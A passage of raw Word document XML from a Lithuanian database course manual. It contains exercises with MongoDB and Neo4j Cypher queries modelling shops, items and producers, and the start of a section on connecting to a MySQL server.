        <w:t>db.getCollection('shops').aggregate([{$unwind: "$items"}, {$group: {_id: "$_id", total: {$sum: "$items.count"}}}]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jei modeliuojama parduotuvė su prekėmis viename dokumente, tai tiek užklausa #1, tiek #2 grąžins visas prekes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUMODELIUOKITE PARDUOTUVĖS SCENARIJŲ GRAFŲ DUOMENŲ BAZĖJE</w:t>
      </w:r>
      <w:r w:rsidR="00A63683">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Parduotuvės ir prekės modeliuojamos kaip viršūnės su skirtingomis žymomis ir susiejamos ryšiu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>create (V1:Shop {code: 'K1', area: 3000, address: 'Kauno g. 11'})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>create (i11559245:Item {code: 11559245, name: 'Skalsioji duona', unit_weight: 1.2, unit_price: 1.8, count: 11})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>match (s:Shop),(i:Item)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>where s.code = 'K1' AND i.code = 2445</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>create (s)-[r:HAS]-&gt;(i)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>return s,i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PARAŠYKITE ŠIAS UŽKLAUSAS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>match (s:Shop {code:'V1'}) return s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>match (s:Shop {code:'V1'})-[r:HAS]-(i:Item) return i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>match (s:Shop)-[r:HAS]-(i:Item {code: 1445}) return s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>match (s:Shop)-[r:HAS]-(i:Item) return s,sum(i.count)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATSIRADO PAPILDOMAS REIKALAVIMAS SUSIETI PREKES SU GAMINTOJO INFORMACIJA. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0001175E" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kiekvienas gamintojas identifikuojamas pagal įmonės pavadinimą, kartu saugoma gamintojo valstybė. Prekės, gaminamos parduotuvėje, nėra susiejamos su gamintoju</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Grafas papildomas naujais elementais pažymėtais žymomis Producer, prekėms sukuriamas ryšys pažymėtas PRODUCEDBY.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>create (p2:Producer {name: "Makers", country: "Germany"})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>match (i:Item {code: 2445}),(p:Producer {name: "Makers"})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>create (i)-[r:PRODUCEDBY]-&gt;(p)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>return i,p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Užklausos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>match (s:Shop)-[r:HAS]-(i:Item)-[pb:PRODUCEDBY]-(p:Producer {country: 'Lithuania'}) return distinct s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>match (s:Shop)-[r:HAS]-(i:Item)-[pb:PRODUCEDBY]-(p:Producer {country: 'Lithuania'}) where i.unit_price &gt; 1 return distinct s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0014495A" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="944" w:name="_Toc13095568"/>
      <w:bookmarkStart w:id="945" w:name="_Toc13833462"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="0001175E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D53308">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Kompetencija. </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Programiškai įgyvendinti</w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir administruoti duomenų bazes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="943"/>
      <w:bookmarkEnd w:id="944"/>
      <w:bookmarkEnd w:id="945"/>
      <w:r w:rsidR="00D53308">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00431918" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="946" w:name="_Toc10444022"/>
      <w:bookmarkStart w:id="947" w:name="_Toc13095569"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.1.</w:t>
      </w:r>
      <w:r w:rsidR="00007311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="948" w:name="_Toc13833463"/>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Diegti ir valdyti duomenų bazių valdymo sistemą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="946"/>
      <w:bookmarkEnd w:id="947"/>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="948"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PRISIJUNKITE PRIE DUOMENŲ BAZIŲ VALDYMO SISTEMOS NAUDODAMI TELNET</w:t>
      </w:r>
      <w:r w:rsidR="00007311">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="1440" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Naudokite komandą </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="907" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>mysql -h hostname -u user_name -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>user_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> reikia pakeisti atitinkamais duomenimis, kuriuos, jei pats neturite administratoriaus teisių, turėtumete gauti iš serverio administratoriaus, sukūrusio jums duomenų bazę. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> yra serverio adresas, kuriame yra instaliuota MySQL DBVS. Jei duomenų bazė yra tame pačiame serveryje (kompiuteryje), iš kurio jungiatės, jis turėtų būti </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Jei jungiatės prie kito (remote) kompiuterio, reikia nurodyti to kompiuterio adresą. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> komanda nurodo MySQL DBVS, kad jos klientas paprašyti slaptažodžio. Jei nenurodysite šios komandos, tuomet MySQL manys, kad jūsų vartotojo vardui nereikalingas slaptažodis prisijungimui prie sistemos. Jei jūs nesate privilegijuotas vartotojas (t.y. administratorius) nenurodžius </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> jūs nebūsite prijungtas prie sistemos. Komanda </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">quit </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>atjungia jus nuo serverio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
